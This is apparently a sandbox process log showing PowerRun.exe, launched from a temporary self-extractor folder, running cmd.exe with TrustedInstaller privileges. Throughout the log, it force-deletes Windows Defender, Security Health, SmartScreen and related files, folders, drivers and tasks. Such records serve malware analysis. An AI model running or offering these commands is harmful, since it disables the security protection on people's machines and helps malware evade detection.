C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\System32\wscadminui.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\System32\wscapi.dll"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\System32\smartscreenps.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\System32\wscadminui.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\System32\wscapi.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\System32\wscisvif.dll"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\System32\wscadminui.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\System32\wscapi.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\System32\wscisvif.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\System32\wscproxystub.dll"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\System32\wscapi.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\System32\wscisvif.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\System32\wscproxystub.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\System32\wscsvc.dll"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\System32\wscisvif.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\System32\wscproxystub.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\System32\wscsvc.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\WinSxS\FileMaps\amd64_windows-defender*.manifest"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\System32\wscproxystub.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\WinSxS\FileMaps\amd64_windows-defender*.manifest"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\System32\wscsvc.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\WinSxS\FileMaps\wow64_windows-defender*.manifest"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\System32\wscsvc.dll"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\WinSxS\FileMaps\amd64_windows-defender*.manifest"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\WinSxS\FileMaps\wow64_windows-defender*.manifest"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\WinSxS\FileMaps\x86_windows-defender*.manifest"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\WinSxS\FileMaps\amd64_windows-defender*.manifest"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\WinSxS\FileMaps\wow64_windows-defender*.manifest"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\WinSxS\FileMaps\x86_windows-defender*.manifest"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\system32\drivers\msseccore.sys"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\WinSxS\FileMaps\wow64_windows-defender*.manifest"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\WinSxS\FileMaps\x86_windows-defender*.manifest"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\system32\drivers\msseccore.sys"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c rmdir /s /q "C:\Program Files (x86)\Windows Defender"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\WinSxS\FileMaps\x86_windows-defender*.manifest"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\system32\drivers\msseccore.sys"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c rmdir /s /q "C:\Program Files (x86)\Windows Defender"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c rmdir /s /q "C:\Program Files (x86)\Windows Defender Advanced Threat Protection"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\system32\drivers\msseccore.sys"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir /s /q "C:\Program Files (x86)\Windows Defender"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c rmdir /s /q "C:\Program Files (x86)\Windows Defender Advanced Threat Protection"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c rmdir /s /q "C:\Program Files\Windows Defender"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c rmdir /s /q "C:\Program Files (x86)\Windows Defender"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir /s /q "C:\Program Files (x86)\Windows Defender Advanced Threat Protection"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c rmdir /s /q "C:\Program Files\Windows Defender"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c rmdir /s /q "C:\Program Files\Windows Defender Advanced Threat Protection"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c rmdir /s /q "C:\Program Files (x86)\Windows Defender Advanced Threat Protection"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir /s /q "C:\Program Files\Windows Defender"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c rmdir /s /q "C:\Program Files\Windows Defender Advanced Threat Protection"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c rmdir /s /q "C:\ProgramData\Microsoft\Storage Health"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c rmdir /s /q "C:\Program Files\Windows Defender"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir /s /q "C:\Program Files\Windows Defender Advanced Threat Protection"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c rmdir /s /q "C:\ProgramData\Microsoft\Storage Health"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c rmdir /s /q "C:\ProgramData\Microsoft\Windows Defender"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c rmdir /s /q "C:\Program Files\Windows Defender Advanced Threat Protection"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir /s /q "C:\ProgramData\Microsoft\Storage Health"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c rmdir /s /q "C:\ProgramData\Microsoft\Windows Defender"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c rmdir /s /q "C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c rmdir /s /q "C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c rmdir /s /q "C:\ProgramData\Microsoft\Storage Health"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir /s /q "C:\ProgramData\Microsoft\Windows Defender"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c rmdir /s /q "C:\ProgramData\Microsoft\Windows Security Health"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir /s /q "C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c rmdir /s /q "C:\ProgramData\Microsoft\Windows Defender"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c rmdir /s /q "C:\ProgramData\Microsoft\Windows Security Health"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c rmdir /s /q "C:\WINDOWS\System32\drivers\wd"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c rmdir /s /q "C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir /s /q "C:\ProgramData\Microsoft\Windows Security Health"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c rmdir /s /q "C:\WINDOWS\System32\drivers\wd"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c rmdir /s /q "C:\Windows\Containers\WindowsDefenderApplicationGuard.wim"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir /s /q "C:\WINDOWS\System32\drivers\wd"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c rmdir /s /q "C:\ProgramData\Microsoft\Windows Security Health"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c rmdir /s /q "C:\Windows\Containers\WindowsDefenderApplicationGuard.wim"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c rmdir /s /q "C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c rmdir /s /q "C:\WINDOWS\System32\drivers\wd"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir /s /q "C:\Windows\Containers\WindowsDefenderApplicationGuard.wim"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c rmdir /s /q "C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c rmdir /s /q "C:\Windows\GameBarPresenceWriter"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir /s /q "C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c rmdir /s /q "C:\Windows\GameBarPresenceWriter"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c rmdir /s /q "C:\Windows\Containers\WindowsDefenderApplicationGuard.wim"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c rmdir /s /q "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c rmdir /s /q "C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir /s /q "C:\Windows\GameBarPresenceWriter"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c rmdir /s /q "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c rmdir /s /q "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c rmdir /s /q "C:\Windows\GameBarPresenceWriter"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir /s /q "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c rmdir /s /q "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c rmdir /s /q "C:\Windows\System32\HealthAttestationClient"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c rmdir /s /q "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir /s /q "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c rmdir /s /q "C:\Windows\System32\HealthAttestationClient"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c rmdir /s /q "C:\Windows\System32\SecurityHealth"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c rmdir /s /q "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir /s /q "C:\Windows\System32\HealthAttestationClient"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c rmdir /s /q "C:\Windows\System32\SecurityHealth"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c rmdir /s /q "C:\Windows\System32\Sgrm"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c rmdir /s /q "C:\Windows\System32\HealthAttestationClient"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir /s /q "C:\Windows\System32\SecurityHealth"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c rmdir /s /q "C:\Windows\System32\Sgrm"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c rmdir /s /q "C:\Windows\System32\Tasks\Microsoft\Windows\Windows Defender"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c rmdir /s /q "C:\Windows\System32\SecurityHealth"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir /s /q "C:\Windows\System32\Sgrm"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c rmdir /s /q "C:\Windows\System32\Tasks\Microsoft\Windows\Windows Defender"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c rmdir /s /q "C:\Windows\System32\Tasks_Migrated\Microsoft\Windows\Windows Defender"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c rmdir /s /q "C:\Windows\System32\Sgrm"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir /s /q "C:\Windows\System32\Tasks\Microsoft\Windows\Windows Defender"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c rmdir /s /q "C:\Windows\System32\Tasks_Migrated\Microsoft\Windows\Windows Defender"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c rmdir /s /q "C:\Windows\System32\WebThreatDefSvc"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c rmdir /s /q "C:\Windows\System32\Tasks\Microsoft\Windows\Windows Defender"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir /s /q "C:\Windows\System32\Tasks_Migrated\Microsoft\Windows\Windows Defender"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c rmdir /s /q "C:\Windows\System32\WebThreatDefSvc"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c rmdir /s /q "C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Defender"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c rmdir /s /q "C:\Windows\System32\Tasks_Migrated\Microsoft\Windows\Windows Defender"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir /s /q "C:\Windows\System32\WebThreatDefSvc"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c rmdir /s /q "C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Defender"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c rmdir /s /q "C:\Windows\System32\WindowsPowerShell\v1.0\Modules\DefenderPerformance"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c rmdir /s /q "C:\Windows\System32\WindowsPowerShell\v1.0\Modules\DefenderPerformance"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c rmdir /s /q "C:\Windows\System32\WebThreatDefSvc"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir /s /q "C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Defender"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c rmdir /s /q "C:\Windows\SystemApps\Microsoft.Windows.AppRep.ChxApp_cw5n1h2txyewy"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir /s /q "C:\Windows\System32\WindowsPowerShell\v1.0\Modules\DefenderPerformance"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c rmdir /s /q "C:\Windows\SystemApps\Microsoft.Windows.AppRep.ChxApp_cw5n1h2txyewy"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c rmdir /s /q "C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Defender"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c rmdir /s /q "C:\Windows\WinSxS\amd64_security-octagon*"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c rmdir /s /q "C:\Windows\System32\WindowsPowerShell\v1.0\Modules\DefenderPerformance"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir /s /q "C:\Windows\SystemApps\Microsoft.Windows.AppRep.ChxApp_cw5n1h2txyewy"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c rmdir /s /q "C:\Windows\WinSxS\amd64_security-octagon*"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c rmdir /s /q "C:\Windows\WinSxS\amd64_windows-defender*"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c rmdir /s /q "C:\Windows\SystemApps\Microsoft.Windows.AppRep.ChxApp_cw5n1h2txyewy"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir /s /q "C:\Windows\WinSxS\amd64_security-octagon*"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c rmdir /s /q "C:\Windows\WinSxS\amd64_windows-defender*"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c rmdir /s /q "C:\Windows\WinSxS\wow64_windows-defender*"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c rmdir /s /q "C:\Windows\WinSxS\amd64_security-octagon*"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c rmdir /s /q "C:\Windows\WinSxS\wow64_windows-defender*"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c rmdir /s /q "C:\Windows\WinSxS\x86_windows-defender*"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir /s /q "C:\Windows\WinSxS\amd64_windows-defender*"
